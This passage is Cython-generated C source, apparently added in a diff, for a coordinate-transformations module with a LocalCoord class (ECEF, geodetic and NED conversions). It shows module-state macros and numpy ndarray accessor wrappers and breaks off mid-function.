section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_7cpython_4type_type __pyx_mstate_global->__pyx_ptype_7cpython_4type_type +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_5numpy_dtype __pyx_mstate_global->__pyx_ptype_5numpy_dtype +#define __pyx_ptype_5numpy_flatiter __pyx_mstate_global->__pyx_ptype_5numpy_flatiter +#define __pyx_ptype_5numpy_broadcast __pyx_mstate_global->__pyx_ptype_5numpy_broadcast +#define __pyx_ptype_5numpy_ndarray __pyx_mstate_global->__pyx_ptype_5numpy_ndarray +#define __pyx_ptype_5numpy_generic __pyx_mstate_global->__pyx_ptype_5numpy_generic +#define __pyx_ptype_5numpy_number __pyx_mstate_global->__pyx_ptype_5numpy_number +#define __pyx_ptype_5numpy_integer __pyx_mstate_global->__pyx_ptype_5numpy_integer +#define __pyx_ptype_5numpy_signedinteger __pyx_mstate_global->__pyx_ptype_5numpy_signedinteger +#define __pyx_ptype_5numpy_unsignedinteger __pyx_mstate_global->__pyx_ptype_5numpy_unsignedinteger +#define __pyx_ptype_5numpy_inexact __pyx_mstate_global->__pyx_ptype_5numpy_inexact +#define __pyx_ptype_5numpy_floating __pyx_mstate_global->__pyx_ptype_5numpy_floating +#define __pyx_ptype_5numpy_complexfloating __pyx_mstate_global->__pyx_ptype_5numpy_complexfloating +#define __pyx_ptype_5numpy_flexible __pyx_mstate_global->__pyx_ptype_5numpy_flexible +#define __pyx_ptype_5numpy_character __pyx_mstate_global->__pyx_ptype_5numpy_character +#define __pyx_ptype_5numpy_ufunc __pyx_mstate_global->__pyx_ptype_5numpy_ufunc +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_6common_15transformations_15transformations_LocalCoord __pyx_mstate_global->__pyx_type_6common_15transformations_15transformations_LocalCoord +#endif +#define __pyx_ptype_6common_15transformations_15transformations_LocalCoord __pyx_mstate_global->__pyx_ptype_6common_15transformations_15transformations_LocalCoord +#define __pyx_n_s_AssertionError __pyx_mstate_global->__pyx_n_s_AssertionError +#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError +#define __pyx_n_s_LocalCoord __pyx_mstate_global->__pyx_n_s_LocalCoord +#define __pyx_n_s_LocalCoord___reduce_cython __pyx_mstate_global->__pyx_n_s_LocalCoord___reduce_cython +#define __pyx_n_s_LocalCoord___setstate_cython __pyx_mstate_global->__pyx_n_s_LocalCoord___setstate_cython +#define __pyx_n_s_LocalCoord_ecef2ned_single __pyx_mstate_global->__pyx_n_s_LocalCoord_ecef2ned_single +#define __pyx_n_s_LocalCoord_from_ecef __pyx_mstate_global->__pyx_n_s_LocalCoord_from_ecef +#define __pyx_n_s_LocalCoord_from_geodetic __pyx_mstate_global->__pyx_n_s_LocalCoord_from_geodetic +#define __pyx_n_s_LocalCoord_geodetic2ned_single __pyx_mstate_global->__pyx_n_s_LocalCoord_geodetic2ned_single +#define __pyx_n_s_LocalCoord_ned2ecef_single __pyx_mstate_global->__pyx_n_s_LocalCoord_ned2ecef_single +#define __pyx_n_s_LocalCoord_ned2geodetic_single __pyx_mstate_global->__pyx_n_s_LocalCoord_ned2geodetic_single +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_n_s__3 __pyx_mstate_global->__pyx_n_s__3 +#define __pyx_n_s__42 __pyx_mstate_global->__pyx_n_s__42 +#define __pyx_n_s_array __pyx_mstate_global->__pyx_n_s_array +#define __pyx_n_s_asfortranarray __pyx_mstate_global->__pyx_n_s_asfortranarray +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_cls __pyx_mstate_global->__pyx_n_s_cls +#define __pyx_kp_s_common_transformations_transform __pyx_mstate_global->__pyx_kp_s_common_transformations_transform +#define __pyx_n_s_common_transformations_transform_2 __pyx_mstate_global->__pyx_n_s_common_transformations_transform_2 +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_double __pyx_mstate_global->__pyx_n_s_double +#define __pyx_n_s_dtype __pyx_mstate_global->__pyx_n_s_dtype +#define __pyx_n_s_e __pyx_mstate_global->__pyx_n_s_e +#define __pyx_n_s_ecef __pyx_mstate_global->__pyx_n_s_ecef +#define __pyx_n_s_ecef2geodetic_single __pyx_mstate_global->__pyx_n_s_ecef2geodetic_single +#define __pyx_n_s_ecef2ned_matrix __pyx_mstate_global->__pyx_n_s_ecef2ned_matrix +#define __pyx_n_s_ecef2ned_single __pyx_mstate_global->__pyx_n_s_ecef2ned_single +#define __pyx_n_s_ecef_euler_from_ned_single __pyx_mstate_global->__pyx_n_s_ecef_euler_from_ned_single +#define __pyx_n_s_ecef_init __pyx_mstate_global->__pyx_n_s_ecef_init +#define __pyx_n_s_ecef_pose __pyx_mstate_global->__pyx_n_s_ecef_pose +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_euler __pyx_mstate_global->__pyx_n_s_euler +#define __pyx_n_s_euler2quat_single __pyx_mstate_global->__pyx_n_s_euler2quat_single +#define __pyx_n_s_euler2rot_single __pyx_mstate_global->__pyx_n_s_euler2rot_single +#define __pyx_n_s_from_ecef __pyx_mstate_global->__pyx_n_s_from_ecef +#define __pyx_n_s_from_geodetic __pyx_mstate_global->__pyx_n_s_from_geodetic +#define __pyx_n_s_g __pyx_mstate_global->__pyx_n_s_g +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_geodetic __pyx_mstate_global->__pyx_n_s_geodetic +#define __pyx_n_s_geodetic2ecef_single __pyx_mstate_global->__pyx_n_s_geodetic2ecef_single +#define __pyx_n_s_geodetic2ned_single __pyx_mstate_global->__pyx_n_s_geodetic2ned_single +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_init __pyx_mstate_global->__pyx_n_s_init +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_n __pyx_mstate_global->__pyx_n_s_n +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_ned __pyx_mstate_global->__pyx_n_s_ned +#define __pyx_n_s_ned2ecef_matrix __pyx_mstate_global->__pyx_n_s_ned2ecef_matrix +#define __pyx_n_s_ned2ecef_single __pyx_mstate_global->__pyx_n_s_ned2ecef_single +#define __pyx_n_s_ned2geodetic_single __pyx_mstate_global->__pyx_n_s_ned2geodetic_single +#define __pyx_n_s_ned_euler_from_ecef_single __pyx_mstate_global->__pyx_n_s_ned_euler_from_ecef_single +#define __pyx_n_s_ned_pose __pyx_mstate_global->__pyx_n_s_ned_pose +#define __pyx_n_s_np __pyx_mstate_global->__pyx_n_s_np +#define __pyx_n_s_numpy __pyx_mstate_global->__pyx_n_s_numpy +#define __pyx_kp_u_numpy_core_multiarray_failed_to __pyx_mstate_global->__pyx_kp_u_numpy_core_multiarray_failed_to +#define __pyx_kp_u_numpy_core_umath_failed_to_impor __pyx_mstate_global->__pyx_kp_u_numpy_core_umath_failed_to_impor +#define __pyx_n_s_pitch __pyx_mstate_global->__pyx_n_s_pitch +#define __pyx_n_s_pose __pyx_mstate_global->__pyx_n_s_pose +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_q __pyx_mstate_global->__pyx_n_s_q +#define __pyx_n_s_quat __pyx_mstate_global->__pyx_n_s_quat +#define __pyx_n_s_quat2euler_single __pyx_mstate_global->__pyx_n_s_quat2euler_single +#define __pyx_n_s_quat2rot_single __pyx_mstate_global->__pyx_n_s_quat2rot_single +#define __pyx_n_s_r __pyx_mstate_global->__pyx_n_s_r +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_roll __pyx_mstate_global->__pyx_n_s_roll +#define __pyx_n_s_rot __pyx_mstate_global->__pyx_n_s_rot +#define __pyx_n_s_rot2euler_single __pyx_mstate_global->__pyx_n_s_rot2euler_single +#define __pyx_n_s_rot2quat_single __pyx_mstate_global->__pyx_n_s_rot2quat_single +#define __pyx_n_s_rot_matrix __pyx_mstate_global->__pyx_n_s_rot_matrix +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_kp_s_self_lc_cannot_be_converted_to_a __pyx_mstate_global->__pyx_kp_s_self_lc_cannot_be_converted_to_a +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_yaw __pyx_mstate_global->__pyx_n_s_yaw +#define __pyx_tuple_ __pyx_mstate_global->__pyx_tuple_ +#define __pyx_tuple__2 __pyx_mstate_global->__pyx_tuple__2 +#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 +#define __pyx_tuple__6 __pyx_mstate_global->__pyx_tuple__6 +#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 +#define __pyx_tuple__10 __pyx_mstate_global->__pyx_tuple__10 +#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 +#define __pyx_tuple__14 __pyx_mstate_global->__pyx_tuple__14 +#define __pyx_tuple__16 __pyx_mstate_global->__pyx_tuple__16 +#define __pyx_tuple__18 __pyx_mstate_global->__pyx_tuple__18 +#define __pyx_tuple__20 __pyx_mstate_global->__pyx_tuple__20 +#define __pyx_tuple__22 __pyx_mstate_global->__pyx_tuple__22 +#define __pyx_tuple__24 __pyx_mstate_global->__pyx_tuple__24 +#define __pyx_tuple__26 __pyx_mstate_global->__pyx_tuple__26 +#define __pyx_tuple__28 __pyx_mstate_global->__pyx_tuple__28 +#define __pyx_tuple__30 __pyx_mstate_global->__pyx_tuple__30 +#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 +#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 +#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__40 __pyx_mstate_global->__pyx_tuple__40 +#define __pyx_codeobj__5 __pyx_mstate_global->__pyx_codeobj__5 +#define __pyx_codeobj__7 __pyx_mstate_global->__pyx_codeobj__7 +#define __pyx_codeobj__9 __pyx_mstate_global->__pyx_codeobj__9 +#define __pyx_codeobj__11 __pyx_mstate_global->__pyx_codeobj__11 +#define __pyx_codeobj__13 __pyx_mstate_global->__pyx_codeobj__13 +#define __pyx_codeobj__15 __pyx_mstate_global->__pyx_codeobj__15 +#define __pyx_codeobj__17 __pyx_mstate_global->__pyx_codeobj__17 +#define __pyx_codeobj__19 __pyx_mstate_global->__pyx_codeobj__19 +#define __pyx_codeobj__21 __pyx_mstate_global->__pyx_codeobj__21 +#define __pyx_codeobj__23 __pyx_mstate_global->__pyx_codeobj__23 +#define __pyx_codeobj__25 __pyx_mstate_global->__pyx_codeobj__25 +#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 +#define __pyx_codeobj__29 __pyx_mstate_global->__pyx_codeobj__29 +#define __pyx_codeobj__31 __pyx_mstate_global->__pyx_codeobj__31 +#define __pyx_codeobj__33 __pyx_mstate_global->__pyx_codeobj__33 +#define __pyx_codeobj__35 __pyx_mstate_global->__pyx_codeobj__35 +#define __pyx_codeobj__37 __pyx_mstate_global->__pyx_codeobj__37 +#define __pyx_codeobj__39 __pyx_mstate_global->__pyx_codeobj__39 +#define __pyx_codeobj__41 __pyx_mstate_global->__pyx_codeobj__41 +/* #### Code section: module_code ### */ + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self) { + PyObject *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":248 + * """Returns a borrowed reference to the object owning the data/memory. + * """ + * return PyArray_BASE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_BASE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self) { + PyArray_Descr *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyArray_Descr *__pyx_t_1; + __Pyx_RefNannySetupContext("descr", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":254 + * """Returns an owned reference to the dtype of the array. + * """ + * return PyArray_DESCR(self) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __pyx_t_1 = PyArray_DESCR(__pyx_v_self); + __Pyx_INCREF((PyObject *)((PyArray_Descr *)__pyx_t_1)); + __pyx_r = ((PyArray_Descr *)__pyx_t_1); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self) { + int __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":260 + * """Returns the number of dimensions in the array. + * """ + * return PyArray_NDIM(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_NDIM(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":268 + * Can return NULL for 0-dimensional arrays. + * """ + * return PyArray_DIMS(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_DIMS(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":275 + * The number of elements matches the number of dimensions of the array (ndim). + * """ + * return PyArray_STRIDES(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_STRIDES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self) { + npy_intp __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":281 + * """Returns the total size (in number of elements) of the array. + * """ + * return PyArray_SIZE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_SIZE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self) { + char *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":290 + * of `PyArray_DATA()` instead, which returns a 'void*'. + * """ + * return PyArray_BYTES(self) # <<<<<<<<<<<<<< + * + * ctypedef unsigned char npy_bool + */ + __pyx_r = PyArray_BYTES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew1(PyObject *__pyx_v_a) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew1", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":777 + * + * cdef inline object PyArray_MultiIterNew1(a): + * return PyArray_MultiIterNew(1, a) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew2(a, b): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(1, ((void *)__pyx_v_a)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 777, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew1", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew2(PyObject *__pyx_v_a, PyObject *__pyx_v_b) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew2", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":780 + * + * cdef inline object PyArray_MultiIterNew2(a, b): + * return PyArray_MultiIterNew(2, a, b) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(2, ((void *)__pyx_v_a), ((void *)__pyx_v_b)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 780, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew2", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew3(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew3", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":783 + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + * return PyArray_MultiIterNew(3, a, b, c) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(3, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 783, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew3", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew4(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew4", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":786 + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + * return PyArray_MultiIterNew(4, a, b, c, d) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(4, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 786, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return 